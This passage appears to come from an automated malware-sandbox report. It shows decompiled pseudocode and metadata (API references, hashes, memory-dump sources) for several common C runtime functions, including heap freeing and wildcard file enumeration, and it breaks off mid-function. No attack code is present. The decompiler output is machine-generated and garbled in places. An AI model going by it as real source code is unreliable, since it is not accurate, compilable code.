0x73218de8
0x00000000
0x73218de8
0x73218ddf
0x73218de5
0x73218de5
0x00000000
0x73218de5
0x73218dbf
0x73218dc4
0x73218dc8
0x00000000
0x00000000
0x73218dca
0x00000000
0x73218dca

APIs

__alloca_probe_16.LIBCMT ref: 73218DBF
__alloca_probe_16.LIBCMT ref: 73218E85
__freea.LIBCMT ref: 73218EF1

Part of subcall function 73217F4F: HeapAlloc.KERNEL32(00000000,73217C8E,73217C8E,?,732169BA,00000220,?,73217C8E,?,?,?,?,73219DA2,00000001,?,?), ref: 73217F81

__freea.LIBCMT ref: 73218EFA
__freea.LIBCMT ref: 73218F1F

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 4816dd35f23df18f3e61624be70fe119325bb996b403c4676c97a2cdc1504634
Instruction ID: fff7f6935e7fef8c9aabdbe2b7eeda6904acd80453182d1f8069f3201b06b3c2
Opcode Fuzzy Hash: 4816dd35f23df18f3e61624be70fe119325bb996b403c4676c97a2cdc1504634
Instruction Fuzzy Hash: 0751B172500317AFEB214E64CE80FAB3AEAEF84650F150169FC0697190EB74DCA087A6

Uniqueness

Uniqueness Score: -1.00%

Function 7321A2E7, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E7321A2E7(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x732316f8; // 0x73231748
					if(_t23 != 0) {
						E73215C03(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x732316fc; // 0x73232270
					if(_t24 != 0) {
						E73215C03(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x73231700; // 0x73232270
					if(_t25 != 0) {
						E73215C03(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x73231728; // 0x7323174c
					if(_t26 != 0) {
						E73215C03(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 - "t\"#st\"#st\"#st\"#st\"#st\"#st\"#s."; // 0x73232274
					if(_t27 != 0) {
						return E73215C03(_t6);
					}
				}
				return _t6;
			}

0x7321a2ed
0x7321a2f2
0x7321a2f6
0x7321a2fc
0x7321a2ff
0x7321a304
0x7321a308
0x7321a30e
0x7321a311
0x7321a316
0x7321a31a
0x7321a320
0x7321a323
0x7321a328
0x7321a32c
0x7321a332
0x7321a335
0x7321a33a
0x7321a33b
0x7321a33e
0x7321a344
0x00000000
0x7321a34c
0x7321a344
0x7321a34f

APIs

_free.LIBCMT ref: 7321A2FF

Part of subcall function 73215C03: HeapFree.KERNEL32(00000000,00000000,?,73214E53), ref: 73215C19
Part of subcall function 73215C03: GetLastError.KERNEL32(?,?,73214E53), ref: 73215C2B

_free.LIBCMT ref: 7321A311
_free.LIBCMT ref: 7321A323
_free.LIBCMT ref: 7321A335
_free.LIBCMT ref: 7321A347

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5d1318072f580d9e71696ef3f2c82aec832da7d52b0dd5a964a39ee38deb0b7a
Instruction ID: ac410e433a90c54c764acad56028d98856082e33b9a7502039847d1982b51d4a
Opcode Fuzzy Hash: 5d1318072f580d9e71696ef3f2c82aec832da7d52b0dd5a964a39ee38deb0b7a
Instruction Fuzzy Hash: 65F090766047039BC644EE69E389F5B33E9EE04B607784845F45BD7580CB30F8E08AA0

Uniqueness

Uniqueness Score: -1.00%

Function 73215DF5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E73215DF5(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E73214B01(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E73218B17(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E73215AE6();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E73215BA6(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E73218B17(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E732163E7(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E73215C03(_t300);
														_t302 = _v12;
													}
													E73215C03(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E73218B17(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E73215AE6();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x73231004; // 0xa57badb2
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E73218B70(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E73215DD6(_t244 - _t287 + 1, _t287,  &_v676, E732162F2(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E73215D07( &(_v608.cFileName),  &_v640,  &_v609, E732162F2(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E73215C03(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E73215C03(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E73218620(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E73215C3D);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E73215C03(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E73212813(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E73215C03(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E73218B30(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E73215C03( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E73215C03(_t283);
						goto L31;
					}
				} else {
					_t219 = E73215B93(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E73215AD6();
					L31:
					return _t297;
				}
				L81:
			}

0x73215dfa
0x73215dfd
0x73215e00
0x73215e01
0x73215e03
0x73215e19
0x73215e1d
0x73215e20
0x73215e22
0x73215e24
0x73215e26
0x73215e28
0x73215e2b
0x73215e2e
0x73215e31
0x73215e33
0x73215e96
0x73215e98
0x73215e9b
0x73215e9d
0x73215ea1
0x73215eaa
0x73215eab
0x73215eae
0x73215eb0
0x73215eb3
0x73215eb7
0x73215eb7
0x73215eb9
0x73215ebb
0x73215ebd
0x73215ebf
0x73215ebf
0x73215ec1
0x73215ec4
0x73215ec7
0x73215ec7
0x73215ec9
0x73215eca
0x73215eca
0x73215ed5
0x73215ed7
0x73215eda
0x73215edb
0x73215ede
0x73215ede
0x73215ee2
0x73215ee5
0x73215ee8
0x73215ee8
0x73215ee8
0x73215ef5
0x73215ef7
0x73215efa
0x73215efc
0x73215f14
0x73215f17
0x73215f1a
0x73215f1c
0x73215f1f
0x73215f21
0x73215f24
0x73215f27
0x73215f84
0x73215f87
0x73215f8a
0x73215f8c
0x00000000
0x73215f29
0x73215f2b
0x73215f2b
0x73215f2d
0x73215f30
0x73215f30
0x73215f32
0x73215f34
0x73215f3a
0x73215f3d
0x73215f3d
0x73215f3f
0x73215f40
0x73215f40
0x73215f47
0x73215f4a
0x73215f4e
0x73215f5b
0x73215f60
0x73215f63
0x73215f65
0x73215fdb
0x73215fdc
0x73215fdd
0x73215fde
0x73215fdf
0x73215fe0
0x73215fe5
0x73215fe9
0x73215feb
0x73215fec
0x73215fef
0x73215fef
0x73215ff2
0x73215ff2
0x73215ff4
0x73215ff5
0x73215ff5
0x73215ff9
0x73215ffa
0x73216001
0x73216004
0x73216007
0x73216009
0x73216013
0x73216014
0x73216015
0x73216018
0x73216022
0x73216026
0x73216028
0x7321603c
0x7321603c
0x7321603f
0x73216049
0x7321604e
0x73216051
0x73216053
0x00000000
0x73216055
0x73216055
0x7321605a
0x73216061
0x73216064
0x73216066
0x73216077
0x73216079
0x7321607b
0x7321607b
0x7321607b
0x73216068
0x73216069
0x7321606e
0x73216071
0x73216080
0x73216086
0x00000000
0x73216089
0x7321602a
0x7321602a
0x73216030
0x73216035
0x73216038
0x7321603a
0x7321608c
0x7321608e
0x7321608f
0x73216090
0x73216091
0x73216092
0x73216093
0x73216098
0x7321609b
0x7321609c
0x7321609e
0x732160a4
0x732160ab
0x732160ae
0x732160b1
0x732160b4
0x732160b5
0x732160b6
0x732160b9
0x732160bf
0x732160c1
0x732160c3
0x732160c3
0x732160c5
0x732160c7
0x00000000
0x00000000
0x732160c9
0x732160cb
0x732160cd
0x732160cf
0x732160da
0x732160dc
0x732160de
0x00000000
0x00000000
0x732160de
0x732160cf
0x00000000
0x732160cb
0x732160e0
0x732160e0
0x732160e6
0x732160e8
0x732160ee
0x732160f0
0x73216112
0x73216112
0x73216114
0x73216116
0x73216122
0x73216122
0x73216118
0x73216118
0x7321611a
0x00000000
0x7321611c
0x7321611c
0x7321611e
0x73216120
0x00000000
0x00000000
0x73216120
0x7321611a
0x7321612a
0x73216132
0x73216138
0x73216139
0x7321613b
0x73216143
0x73216149
0x7321614f
0x73216155
0x73216169
0x7321616e
0x73216179
0x73216189
0x7321618f
0x73216191
0x73216194
0x732161b7
0x732161b7
0x732161bc
0x732161c2
0x732161c2
0x732161c8
0x732161ce
0x732161d4
0x732161da
0x732161e0
0x73216201
0x73216206
0x7321620b
0x7321620f
0x73216215
0x73216218
0x7321622b
0x7321622b
0x73216231
0x73216237
0x73216238
0x73216239
0x7321623e
0x73216241
0x73216247
0x73216249
0x732162a7
0x732162ad
0x732162b5
0x732162ba
0x732162c0
0x732162c1
0x00000000
0x00000000
0x00000000
0x7321621a
0x7321621a
0x7321621d
0x7321621f
0x00000000
0x73216221
0x73216221
0x73216224
0x00000000
0x73216226
0x73216226
0x73216229
0x00000000
0x00000000
0x00000000
0x00000000
0x73216229
0x73216224
0x7321621f
0x732162c3
0x732162c4
0x00000000
0x7321624b
0x7321624b
0x73216251
0x73216259
0x7321625e
0x7321626d
0x7321626d
0x73216275
0x7321627b
0x73216281
0x73216288
0x7321628b
0x7321628d
0x7321629d
0x732162a2
0x00000000
0x73216196
0x73216196
0x7321619c
0x7321619d
0x7321619e
0x7321619f
0x732161a7
0x732161a7
0x732162ca
0x732162ca
0x732162d1
0x732162d2
0x732162da
0x732162df
0x732162e0
0x732160f2
0x732160f2
0x732160f5
0x732160f7
0x7321610c
0x00000000
0x732160f9
0x732160f9
0x732160fc
0x732160fd
0x732160fe
0x732160ff
0x73216104
0x732160f7
0x732162e5
0x732162e6
0x732162e8
0x732162f1
0x00000000
0x00000000
0x00000000
0x7321603a
0x7321600b
0x7321600d
0x7321600e
0x73216012
0x73216012
0x00000000
0x00000000
0x00000000
0x00000000
0x73215f67
0x73215f67
0x73215f6d
0x73215f70
0x73215f73
0x73215f76
0x73215f79
0x73215f7c
0x73215f7f
0x73215f7f
0x00000000
0x73215f30
0x73215efe
0x73215efe
0x73215f01
0x73215f8e
0x73215f8f
0x73215f94
0x00000000
0x73215f94
0x73215e35
0x73215e35
0x73215e38
0x73215e40
0x73215e43
0x73215e4a
0x73215e4c
0x73215e4e
0x73215e69
0x73215e6a
0x73215e6b
0x73215e6c
0x73215e71
0x73215e74
0x73215e77
0x73215e50
0x73215e50
0x73215e53
0x73215e54
0x73215e55
0x73215e56
0x73215e57
0x73215e5c
0x73215e5e
0x73215e61
0x73215e61
0x73215e79
0x73215e7b
0x00000000
0x00000000
0x73215e84
0x73215e87
0x73215e8a
0x73215e8c
0x73215e8e
0x00000000
0x73215e90
0x73215e90
0x73215e93
0x00000000
0x73215e93
0x00000000
0x73215e8e
0x73215f09
0x73215f95
0x73215f98
0x73215f9c
0x73215fa5
0x73215fa8
0x73215fac
0x73215fac
0x73215fae
0x73215fb1
0x73215fb3
0x73215fb5
0x73215fb7
0x73215fbc
0x73215fbd
0x73215fc1
0x73215fc1
0x73215fc5
0x73215fc8
0x73215fc8
0x73215fcc
0x00000000
0x73215fd3
0x73215e05
0x73215e05
0x73215e0c
0x73215e0d
0x73215e0f
0x73215fd4
0x73215fda
0x73215fda
0x00000000

APIs

_free.LIBCMT ref: 73215F8F

Strings

*?, xrefs: 73215E38

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
Instruction ID: 61456f103ad2eb259865d7599c88e49c2ddc9919b6b7af1560c823bba703a073
Opcode Fuzzy Hash: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
Instruction Fuzzy Hash: 0C6132B5D0021A9FDB15CFACC9806DEFBF9EF48310B2841AAE815E7340D7759E918B90

Uniqueness

Uniqueness Score: -1.00%

Function 73215D07, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73215D07(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E73216F05(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E73216F05(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E73215B5D(GetLastError());
									_t19 =  *((intOrPtr*)(E73215B93(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E7321634D(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E73215B5D(GetLastError());
						return  *((intOrPtr*)(E73215B93(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E7321634D(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E73216333(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x73215d0e
0x73215d13
0x73215d31
0x73215d33
0x73215d36
0x73215d63
0x73215d6b
0x73215d6d
0x73215d86
0x73215d89
0x73215d8c
0x73215d9a
0x73215da9
0x73215db1
0x73215db3
0x73215dcc
0x73215dcf
0x73215dcf
0x73215db5
0x73215dbc
0x73215dc7
0x73215dc7
0x73215dd1
0x00000000
0x73215dd1
0x73215d91
0x73215d96
0x73215d98
0x00000000
0x00000000
0x00000000
0x73215d98
0x73215d76
0x00000000
0x73215d81
0x73215d38
0x73215d3b
0x73215d3e
0x73215d51
0x73215d54
0x73215d27
0x73215d27
0x00000000
0x73215d2a
0x73215d44
0x73215d49
0x73215d4b
0x73215dd5
0x73215dd5
0x00000000
0x73215d4b
0x73215d15
0x73215d1a
0x73215d1f
0x73215d21
0x73215d24
0x00000000

APIs

Part of subcall function 73216333: _free.LIBCMT ref: 73216341

Part of subcall function 73216F05: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,73218EE7,?,00000000,00000000), ref: 73216FA7

GetLastError.KERNEL32 ref: 73215D6F
__dosmaperr.LIBCMT ref: 73215D76
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 73215DB5
__dosmaperr.LIBCMT ref: 73215DBC

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 3095ae09c3ed2b61b0d041e016bf4a8f711f321e960ae33244da651185a01d7d
Instruction ID: bae293188863d15f66cce4d775f717a0677ad0a13d8226e4ecd3368ca874bcd1
Opcode Fuzzy Hash: 3095ae09c3ed2b61b0d041e016bf4a8f711f321e960ae33244da651185a01d7d
Instruction Fuzzy Hash: 3E21D8F150030BAFE7115FB98E88F1BB7EDEF012647348554E92993190D771ECA047A0

Uniqueness

Uniqueness Score: -1.00%

Function 73215603, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E73215603(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
